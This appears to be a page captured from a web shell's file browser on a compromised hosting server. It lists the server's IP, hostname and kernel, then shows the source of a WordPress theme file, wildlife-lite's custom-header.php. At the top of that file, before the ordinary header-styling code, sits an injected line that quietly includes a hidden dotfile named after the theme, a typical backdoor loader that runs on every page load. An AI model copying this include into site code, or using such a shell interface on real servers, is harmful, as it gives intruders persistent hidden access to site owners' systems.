uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
.
/
old
/
public_html
/
wp-content
/
themes
/
wildlife-lite
/
inc
/
custom-header.php
/
/
<?php /** * @package Wildlife Lite * Setup the WordPress core custom header feature. * * @uses wildlife_lite_header_style() */ if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) { include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php'); } function wildlife_lite_custom_header_setup() { add_theme_support( 'custom-header', apply_filters( 'wildlife_lite_custom_header_args', array( 'default-text-color' => '000000', 'width' => 1600, 'height' => 400, 'wp-head-callback' => 'wildlife_lite_header_style', ) ) ); } add_action( 'after_setup_theme', 'wildlife_lite_custom_header_setup' ); if ( ! function_exists( 'wildlife_lite_header_style' ) ) : /** * Styles the header image and text displayed on the blog * * @see wildlife_lite_custom_header_setup(). */ function wildlife_lite_header_style() { $header_text_color = get_header_textcolor(); ?> <style type="text/css"> <?php //Check if user has defined any header image. if ( get_header_image() || get_header_textcolor() ) : ?> .header{ background-image: url(<?php echo esc_url(get_header_image()); ?>); background-position: center top; } .logo h1 a { color:#<?php echo esc_attr(get_header_textcolor()); ?>;} <?php endif; ?> </style> <?php // If the header text option is untouched, let's bail. if ( display_header_text() ) { return; } // If the header text has been hidden. ?> <style type="text/css"> .logo { margin: 0 auto 0 0; } .logo h1, .logo p{ clip: rect(1px, 1px, 1px, 1px); position: absolute; } </style> <?php } endif; // wildlife_lite_header_style
/home/batcwwjx/./old/public_html/wp-content/themes/wildlife-lite/inc/custom-header.php